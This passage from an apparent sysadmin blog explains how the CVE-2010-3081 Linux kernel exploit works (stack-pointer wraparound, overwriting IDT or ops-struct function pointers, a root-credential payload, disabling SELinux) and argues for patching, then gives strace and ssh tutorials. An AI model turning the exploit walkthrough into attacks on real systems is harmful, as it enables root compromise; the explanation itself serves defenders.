  • Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space.
  • When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code.
  • Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target.
The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself.
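The wraparound is just unsigned pointer arithmetic, which we can model with Python integers. This is a simplified sketch: the function names are mine, USER_LIMIT is an assumed user/kernel boundary chosen for illustration, the access_ok here is a stand-in for the kernel's real check, and the example values are not the ones the exploit used.

```python
MASK64 = (1 << 64) - 1
USER_LIMIT = 0x0000_7FFF_FFFF_F000  # assumed top of user space, for illustration only


def alloc_user_space_unchecked(sp, length):
    """Model of the old behaviour: subtract from the stack pointer, wrapping at 64 bits."""
    return (sp - length) & MASK64


def access_ok(addr, size):
    """Simplified stand-in: the whole range must lie below the user-space limit."""
    return addr + size <= USER_LIMIT


def alloc_user_space_checked(sp, length):
    """Model of the fix: refuse any result that is not entirely user memory."""
    addr = alloc_user_space_unchecked(sp, length)
    return addr if access_ok(addr, length) else None


if __name__ == "__main__":
    sp = 0xFFFFD000  # a plausible stack pointer for a 32-bit process
    print(hex(alloc_user_space_unchecked(sp, 0x100)))
    print(hex(alloc_user_space_unchecked(sp, 0x1_0000_0000)))
    print(alloc_user_space_checked(sp, 0x1_0000_0000))
```

With a small length the result sits just below the stack pointer; with a length larger than the stack pointer the subtraction wraps to the very top of the 64-bit address space, and only the checked version rejects it.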

More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light.

The Target: Function Pointers Everywhere

The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload.

A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem.

  • The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
  • timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
  • The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.
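
The "ops struct" idea can be sketched in a few lines of Python. This is only a toy model of the timer_list_fops target described above: OpsTable, do_poll, generic_poll, and payload are hypothetical names, and nothing here touches a real kernel. It shows why overwriting an unused slot in a table of function pointers is enough to redirect a later call.

```python
# Toy model of an "ops struct": a table of function pointers.
# Every name here is hypothetical; nothing below touches a real kernel.

def generic_poll(file_name):
    """Default behaviour inherited when a file provides no poll method."""
    return f"generic poll on {file_name}"


class OpsTable:
    """Stand-in for a struct of function pointers such as timer_list_fops."""

    def __init__(self, read=None, poll=None):
        self.read = read
        self.poll = poll


def do_poll(ops, file_name):
    """Dispatch like a virtual method call: use the slot if it is set."""
    handler = ops.poll if ops.poll is not None else generic_poll
    return handler(file_name)


def payload(file_name):
    """Stand-in for the attacker's code."""
    return f"payload ran via poll on {file_name}"


ops = OpsTable(read=lambda name: f"contents of {name}")
before = do_poll(ops, "/proc/timer_list")   # slot empty: generic behaviour
ops.poll = payload                          # the "scribble" over the unused slot
after = do_poll(ops, "/proc/timer_list")    # the same call now reaches the payload
```

Because nobody normally calls poll on this file, the overwritten slot goes unnoticed until the attacker triggers it.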

The Payload: Steal Privileges

Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns.

This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly.

This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell.

In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.

Flexibility, or, You Can't Trust a Failing Exploit

All the points of flexibility in this exploit illustrate a key lesson: you can't conclude you're not vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this:
  $ ./ABftw
  Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
  $$$ Kallsyms +r
  $$$ K3rn3l r3l3as3:
  !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z 
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?"

Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel.

In general, there is an almost unlimited amount of work an exploit writer could put in to make the exploit function on more and more kernels: use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of more work to extend the exploit to function there too.

That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update.


Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs spend very long in that pure realm between having to deal with a file or the network or some other part of the system, and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock

So git status takes the lock, and git diff doesn't.
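
A note on the shell plumbing: strace writes its trace to stderr, so 2>&1 >/dev/null sends the trace down the pipe while discarding the command's own output. If you would rather post-process a saved trace, the same filtering is easy to sketch in Python. The helper names and the extra ".git/HEAD" sample line are assumptions added for illustration; the other two lines are the ones shown above.

```python
def syscalls_mentioning(trace_text, needle):
    """Return the trace lines that mention `needle`, like `grep needle`."""
    return [line for line in trace_text.splitlines() if needle in line]


def syscall_name(line):
    """Extract the syscall name, i.e. everything before the first '('."""
    return line.split("(", 1)[0].strip()


# Sample input: the two relevant lines from the `git status` trace,
# plus one unrelated line made up for illustration.
SAMPLE_TRACE = '''\
open(".git/HEAD", O_RDONLY) = 3
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0
'''

hits = syscalls_mentioning(SAMPLE_TRACE, "index.lock")
names = [syscall_name(line) for line in hits]
```

Here names comes out as the open and rename calls, which is the whole life cycle of the lock file: create it exclusively, then rename it over the real index.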

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.
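
With -T, each line of the trace ends with the time spent in that syscall, in seconds, inside angle brackets. A small sketch like the following can pull out the slowest calls from a saved trace. The function name and the sample lines (including their timings) are made up for illustration.

```python
import re

# strace -T appends the time spent in each syscall as "<seconds>" at the end
# of the line. The sample lines below are made up for illustration.
DURATION = re.compile(r"<(\d+\.\d+)>\s*$")


def slowest_syscalls(trace_lines, top=3):
    """Return up to `top` (seconds, line) pairs, slowest first."""
    timed = []
    for line in trace_lines:
        match = DURATION.search(line)
        if match:                       # unfinished calls have no duration yet
            timed.append((float(match.group(1)), line))
    timed.sort(key=lambda pair: pair[0], reverse=True)
    return timed[:top]


SAMPLE = [
    'write(3, "SELECT ..."..., 52) = 52 <0.000031>',
    'read(3, "..."..., 16384) = 116 <0.204518>',
    'poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout) <0.000012>',
]

slowest = slowest_syscalls(SAMPLE, top=1)
```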

By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52

Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.
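
If you save such a trace to a file, the hex dump can be turned back into the original bytes. Here is a minimal sketch, assuming the dump layout shown above (an offset, up to 16 hex bytes, then a printable rendering); the function name and regular expression are my own, not part of strace.

```python
import re

# One dump line looks like:
#  | 00010  73 74 61 6d ...  stamp FR OM artif |
# i.e. an offset, up to 16 hex bytes, then a printable rendering.
DUMP_LINE = re.compile(r"^\s*\|\s*[0-9a-f]{5,}\s+((?:[0-9a-f]{2}\s{1,2}){1,16})")


def bytes_from_dump(lines):
    """Reassemble the raw bytes from strace's hex dump lines."""
    data = bytearray()
    for line in lines:
        match = DUMP_LINE.match(line)
        if match:                       # skips the syscall lines themselves
            data += bytes.fromhex(match.group(1))
    return bytes(data)


DUMP = [
    'write(3, "0\\0\\0\\0\\3SELECT timestamp FROM artifa"..., 52) = 52',
    " | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |",
    " | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |",
    " | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |",
    " | 00030  31 34 35 34                                       1454              |",
]

query = bytes_from_dump(DUMP)
```

The result is 52 bytes long, matching the return value of write(): a five-byte header followed by the text SELECT timestamp FROM artifacts WHERE id = 1454.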

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.
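
If you already have a combined -f trace, you can untangle it after the fact. The sketch below groups lines by their [pid N] prefix. It is a simplification: lines without a prefix are collected under a placeholder key rather than attributed to a process, and the names are my own. The sample lines are taken from the trace above.

```python
import re
from collections import defaultdict

PID_PREFIX = re.compile(r"^\[pid\s+(\d+)\]\s+(.*)$")


def split_by_pid(trace_lines, unprefixed_key="unprefixed"):
    """Group `strace -f` output by the [pid N] prefix on each line."""
    per_process = defaultdict(list)
    for line in trace_lines:
        match = PID_PREFIX.match(line)
        if match:
            per_process[match.group(1)].append(match.group(2))
        else:
            # No prefix: this sketch does not try to guess the owner.
            per_process[unprefixed_key].append(line)
    return dict(per_process)


SAMPLE = [
    'stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0',
    '[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3',
    '[pid 10738] dup2(3, 1)                  = 1',
    '[pid 10738] close(3)                    = 0',
    '[pid 10682] wait4(-1, Process 10682 suspended',
]

groups = split_by_pid(SAMPLE)
```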

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3
/tmp/foobar.lock

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.
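
The giveaway in the lsof output is the FD column: both processes have the file open as descriptor 3 in read/write mode (3u), but only 21856 has the trailing W, which lsof uses to mark a write lock on the whole file. A rough sketch of picking that out automatically follows. The function name is hypothetical, and the parsing assumes lsof's usual nine-column layout and a path without spaces.

```python
import re

# FD column: descriptor number, access mode (r, w or u), optional lock flag.
FD_FIELD = re.compile(r"^(\d+)([rwu])([A-Za-z]?)$")


def lock_holders(lsof_lines, path):
    """Return PIDs whose descriptor on `path` carries a lock flag in the FD column."""
    holders = []
    for line in lsof_lines:
        fields = line.split()
        # Expected columns: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
        if len(fields) < 9 or fields[-1] != path:
            continue
        match = FD_FIELD.match(fields[3])
        if match and match.group(3):
            holders.append(int(fields[1]))
    return holders


LSOF_OUTPUT = [
    " command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock",
    " command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock",
]

holders = lock_holders(LSOF_OUTPUT, "/tmp/foobar.lock")
```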

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?


Monday Jul 26, 2010

Six things I wish Mom told me (about ssh)

If you've ever seriously used a Linux system, you're probably already familiar with at least the basics of ssh. But you're hungry for more. In this post, we'll show you six ssh tips that'll help take you to the next level. (We've also found that they make for excellent cocktail party conversation talking points.)

(1) Take command!

Everyone knows that you can use ssh to get a remote shell, but did you know that you can also use it to run commands on their own? Well, you can--just stick the command name after the hostname! Case in point:

wdaher@rocksteady:~$ ssh bebop uname -a
Linux bebop 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 05:14:15 UTC 2010 x86_64 GNU/Linux

Combine this with passwordless ssh logins, and your shell scripting powers have just leveled up. Want to figure out what version of Python you have installed on each of your systems? Just stick ssh hostname python -V in a for loop, and you're done!

Some commands, however, don't play along so nicely:

wdaher@rocksteady:~$ ssh bebop top
TERM environment variable not set.

What gives? Some programs need a pseudo-tty, and aren't happy if they don't have one (anything that wants to draw on arbitrary parts of the screen probably falls into this category). But ssh can handle this too--the -t option will force ssh to allocate a pseudo-tty for you, and then you'll be all set.

# Revel in your process-monitoring glory
wdaher@rocksteady:~$ ssh bebop -t top
# Or, resume your session in one command, if you're a GNU Screen user
wdaher@rocksteady:~$ ssh bebop -t screen -dr
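
If your "for loop" lives in a Python script rather than the shell, the same idea can be sketched as below. ssh_argv is a hypothetical helper and the host list is a placeholder; the sketch only builds the argument lists, which you could then hand to subprocess.run() once passwordless logins are set up.

```python
import shlex


def ssh_argv(host, remote_command, force_tty=False):
    """Build the argument list for running one command on `host` over ssh."""
    argv = ["ssh"]
    if force_tty:
        argv.append("-t")           # ask ssh to allocate a pseudo-tty
    argv.append(host)
    argv.extend(shlex.split(remote_command))
    return argv


HOSTS = ["bebop", "rocksteady"]     # example hostnames; substitute your own
commands = [ssh_argv(host, "python -V") for host in HOSTS]
```

For example, ssh_argv("bebop", "top", force_tty=True) produces the arguments for the top invocation above, with -t placed before the hostname.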

(2) Please, try a sip of these ports

But wait, there's more! ssh's ability to forward ports is incredibly powerful. Suppose you have a web dashboard at work that runs on a host called analytics, on port 80, and is only accessible from inside the office, and you're at home but need to access it because it's 2 a.m. and your pager is going off.

Fortunately, you can ssh to your desktop at work, desktop, which is on the same network as analytics. So if we can connect to desktop, and desktop can connect to analytics, surely we can make this work, right?

Right. We'll start out with something that doesn't quite do what we want:

wdaher@rocksteady:~$ ssh desktop -L 8080:desktop:80

OK, the ssh desktop is the straightforward part. The -L port:hostname:hostport option says "Set up a port forward from port (in this case, 8080) to hostname:hostport (in this case, desktop:80)."

So now, if you visit http://localhost:8080/ in your web browser at home, you'll actually be connected to port 80 on desktop. Close, but not quite! Remember, we wanted to connect to the web dashboard, running on port 80, on analytics, not desktop.

All we do, though, is adjust the command like so:

wdaher@rocksteady:~$ ssh desktop -L 8080:analytics:80

Now, the remote end of the port forward is analytics:80, which is precisely where the web dashboard is running. But wait, isn't analytics behind the firewall? How can we even reach it? Remember: this connection is being set up on the remote system (desktop), which is the only reason it works.

If you find yourself setting up multiple such forwards, you're probably better off doing something more like:

wdaher@rocksteady:~$ ssh -D 8080 desktop

This will set up a SOCKS proxy at localhost:8080. If you configure your browser to use it, all of your browser traffic will go over SSH and through your remote system, which means you could just navigate to http://analytics/ directly.

(3) Til-de do us part

Riddle me this: ssh into a system, press Enter a few times, and then type in a tilde. Nothing appears. Why?

Because the tilde is ssh's escape character. Right after a newline, you can type ~ and a number of other keystrokes to do interesting things to your ssh connection (like give you 30 extra lives in each continue.) ~? will display a full list of the escape sequences, but two handy ones are ~. and ~^Z.

~. (a tilde followed by a period) will terminate the ssh connection, which is handy if you lose your network connection and don't want to wait for your ssh session to time out.  ~^Z (a tilde followed by Ctrl-Z) will put the connection in the background, in case you want to do something else on the host while ssh is running. An example of this in action:

wdaher@rocksteady:~$ ssh bebop
wdaher@bebop:~$ sleep 10000
wdaher@bebop:~$ ~^Z [suspend ssh]

[1]+  Stopped                 ssh bebop
wdaher@rocksteady:~$ # Do something else
wdaher@rocksteady:~$ fg # and you're back!

(4) Dusting for prints

I'm sure you've seen this a million times, and you probably just type "yes" without thinking twice:

wdaher@rocksteady:~$ ssh bebop
The authenticity of host 'bebop (' can't be established.
RSA key fingerprint is a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68.
Are you sure you want to continue connecting (yes/no)?

What's actually going on here? Well, if this is your first time connecting to bebop, you can't really tell whether the machine you're talking to is actually bebop, or just an impostor pretending to be bebop. All you know is the key fingerprint of the system you're talking to.  In principle, you're supposed to verify this out-of-band (i.e. call up the remote host and ask them to read off the fingerprint.)

Let's say you and your incredibly security-minded friend actually want to do this. How does one actually find this fingerprint? On the remote host, have your friend run:

sbaker@bebop:~$ ssh-keygen -l -f /etc/ssh/
2048 a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68 /etc/ssh/ (RSA)

Tada! They match, and it's safe to proceed. From now on, this is stored in your list of ssh "known hosts" (in ~/.ssh/known_hosts), so you don't get the prompt every time. And if the key ever changes on the other end, you'll get an alert--someone's trying to read your traffic! (Or your friend reinstalled their system and didn't preserve the key.)

(5) Losing your keys

Unfortunately, some time later, you and your friend have a falling out (something about Kirk vs. Picard), and you want to remove their key from your known hosts. "No problem," you think, "I'll just remove it from my list of known hosts." You open up the file and are unpleasantly surprised: a jumbled file full of all kinds of indecipherable characters. They're actually hashes of the hostnames (or IP addresses) that you've connected to before, and their associated keys.

Before you proceed, surely you're asking yourself: "Why would anyone be so cruel? Why not just list the hostnames in plain text, so that humans could easily edit the file?" In fact, that's actually how it was done until very recently. But it turns out that leaving them in the clear is a potential security risk, since it provides an attacker a convenient list of other places you've connected (places where, e.g., an unwitting user might have used the same password).

Fortunately, ssh-keygen -R <hostname> does the trick:

wdaher@rocksteady:~$ ssh-keygen -R bebop
/home/wdaher/.ssh/known_hosts updated.
Original contents retained as /home/wdaher/.ssh/known_hosts.old
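
For the curious, the hashing is not magic. This sketch assumes the hashed host field has the layout |1|salt|hash, where both parts are base64 and the hash is an HMAC-SHA1 of the hostname keyed by the salt. The function names are my own, and the fixed salt is only there to make the demo repeatable. It shows why you can test a guess against an entry but cannot read the hostname back out of it.

```python
import base64
import hashlib
import hmac


def hash_hostname(hostname, salt):
    """Produce a hashed host field: HMAC-SHA1 of the name, keyed by the salt."""
    digest = hmac.new(salt, hostname.encode("ascii"), hashlib.sha1).digest()
    return "|1|{}|{}".format(
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def entry_matches(hashed_field, hostname):
    """Check whether a hashed host field was generated from `hostname`."""
    parts = hashed_field.split("|")
    # A hashed field splits into ['', '1', salt, hash].
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        return False
    salt = base64.b64decode(parts[2])
    expected = base64.b64decode(parts[3])
    actual = hmac.new(salt, hostname.encode("ascii"), hashlib.sha1).digest()
    return hmac.compare_digest(actual, expected)


# Fixed salt for a repeatable demo; real entries use a random salt.
demo_field = hash_hostname("bebop", b"\x00" * 20)
```

This is essentially what a tool has to do to find the line for a given hostname: try the name against each entry's salt until one matches.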

I'm told there's still no easy way to remove now-bitter memories of your friendship together, though.

(6) A connection by any other name...

If you've read this far, you're an ssh pro. And like any ssh pro, you log into a bajillion systems, each with their own usernames, ports, and long hostnames. Like your accounts at AWS, Rackspace Cloud, your dedicated server, and your friend's home system.

You already know how to do this: use username@host or -l username to specify your username, and -p portnumber to specify the port:

